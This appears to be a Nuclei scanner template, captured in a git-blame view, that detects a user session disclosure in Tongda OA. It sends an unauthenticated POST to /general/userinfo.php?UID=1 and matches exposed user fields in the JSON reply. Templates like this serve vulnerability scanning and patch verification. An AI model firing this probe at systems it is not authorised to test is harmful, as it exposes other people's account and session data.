2022-04-09 19:37:22 +00:00
|
|
|
id: tongda-session-disclosure
|
2022-04-08 08:12:20 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Tongda User Session Disclosure
|
|
|
|
author: ritikchaddha
|
|
|
|
severity: medium
|
2024-01-02 15:45:12 +00:00
|
|
|
description: Tongda User session exposed.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: tongda,disclosure
|
2022-04-08 08:12:20 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-04-08 08:12:20 +00:00
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/general/userinfo.php?UID=1"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
2022-04-09 19:37:22 +00:00
|
|
|
words:
|
|
|
|
- '"dept_name":"'
|
|
|
|
- '"online_flag":'
|
|
|
|
condition: and
|
2022-04-08 08:12:20 +00:00
|
|
|
|
|
|
|
- type: word
|
2022-04-09 19:37:22 +00:00
|
|
|
part: header
|
2022-04-08 08:12:20 +00:00
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022042c55572197fe62590ea68bfcffe5fefb8f20e640ce01f73b8d09827525e29de022100934eadb97937bc16763ec5d9221b7c1f6c41f985195db21250625142ef796973:922c64590222798bb761d5b6d8e72950
|